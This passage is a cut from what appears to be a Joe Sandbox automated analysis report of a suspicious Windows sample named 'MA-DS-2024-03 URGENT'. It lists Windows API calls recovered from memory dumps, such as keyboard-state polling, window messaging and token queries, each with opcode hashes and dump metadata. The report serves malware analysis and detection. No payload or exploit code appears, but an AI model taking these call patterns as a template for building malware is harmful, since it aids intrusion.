                                                        • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                        • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                        • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                        • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                        • TranslateMessage.USER32(?), ref: 0045645C
                                                        • DispatchMessageW.USER32(?), ref: 00456466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                        • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                        • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                        • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00458A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
                                                        • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                        • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                        • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                        • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0045B204
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                        • _wcsstr.LIBCMT ref: 0045B289
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID:
                                                        • API String ID: 3902887630-0
                                                        • Opcode ID: d87f298fa4dae38cd6f0312fc2614bf8a2a084d96132e83ee32c0d3e76b571e2
                                                        • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                                        • Opcode Fuzzy Hash: d87f298fa4dae38cd6f0312fc2614bf8a2a084d96132e83ee32c0d3e76b571e2
                                                        • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                                        APIs
                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                                        • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Window$Long$MetricsSystem
                                                        • String ID:
                                                        • API String ID: 2294984445-0
                                                        • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                        • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                                        • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                                        • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                                        • __itow.LIBCMT ref: 0045936A
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                                        • __itow.LIBCMT ref: 004593A3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow$_memmove
                                                        • String ID:
                                                        • API String ID: 2983881199-0
                                                        • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                        • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                                        • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                                        • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                                        APIs
                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                                        • SelectObject.GDI32(?,00000000), ref: 0040135C
                                                        • BeginPath.GDI32(?), ref: 00401373
                                                        • SelectObject.GDI32(?,00000000), ref: 0040139C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ObjectSelect$BeginCreatePath
                                                        • String ID:
                                                        • API String ID: 3225163088-0
                                                        • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                        • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                                        • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                                        • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                                        • __beginthreadex.LIBCMT ref: 00464AD8
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                        • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                                        • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                                        • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                                        APIs
                                                        • GetLastError.KERNEL32(00000008,?,?,016B15D8,016B3CBB,?,016B1D2A,?,?,00000000), ref: 016B18E4
                                                        • _free.LIBCMT ref: 016B1919
                                                        • _free.LIBCMT ref: 016B1940
                                                        • SetLastError.KERNEL32(00000000,?,016B1D2A,?,?,00000000), ref: 016B194D
                                                        • SetLastError.KERNEL32(00000000,?,016B1D2A,?,?,00000000), ref: 016B1956
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 4a541e87c464ef2b53855308e4ec21ba13c6175b16d801ce8492d104c936ebef
                                                        • Instruction ID: 3304e3a102767aebf341ceea58f8defbfa6128de3aa7613ed8c7958b3284e2fa
                                                        • Opcode Fuzzy Hash: 4a541e87c464ef2b53855308e4ec21ba13c6175b16d801ce8492d104c936ebef
                                                        • Instruction Fuzzy Hash: D401D6361006427B932276787CE8AFB169F9BC7575721012DF615A3242FB7284D28354
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                                        • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                                        • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                        • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                                        • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                                        • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                        • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                                        • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                                        • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                        • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                                        • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                                        • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                        • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                                        • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                                        • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                                        • MessageBeep.USER32(00000000), ref: 0045C226
                                                        • KillTimer.USER32(?,0000040A), ref: 0045C242
                                                        • EndDialog.USER32(?,00000001), ref: 0045C25C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                        • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                                        • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                                        • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                                        APIs
                                                        • _free.LIBCMT ref: 016B3189
                                                          • Part of subcall function 016B2096: HeapFree.KERNEL32(00000000,00000000,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?), ref: 016B20AC
                                                          • Part of subcall function 016B2096: GetLastError.KERNEL32(?,?,016B3208,?,00000000,?,00000000,?,016B322F,?,00000007,?,?,016B2697,?,?), ref: 016B20BE
                                                        • _free.LIBCMT ref: 016B319B
                                                        • _free.LIBCMT ref: 016B31AD
                                                        • _free.LIBCMT ref: 016B31BF
                                                        • _free.LIBCMT ref: 016B31D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 07bc52124b5541a0809fdbec7bee18ffccab860ca606c3fa5bbb133ff20342da
                                                        • Instruction ID: 3c369ff40bc2481d0b51e4506816dbf04d7e6e303d251b8b81cb1fe2897e6f17
                                                        • Opcode Fuzzy Hash: 07bc52124b5541a0809fdbec7bee18ffccab860ca606c3fa5bbb133ff20342da
                                                        • Instruction Fuzzy Hash: AFF01232A46201AB9634DA6CFDC5C9A7BEEBA04612B54180DF559D7705CB30F8D0CB64
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 004013BF
                                                        • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                                        • SelectObject.GDI32(?,00000000), ref: 004013EE
                                                        • DeleteObject.GDI32 ref: 00401401
                                                        • StrokePath.GDI32(?), ref: 0040141C
                                                        Memory Dump Source
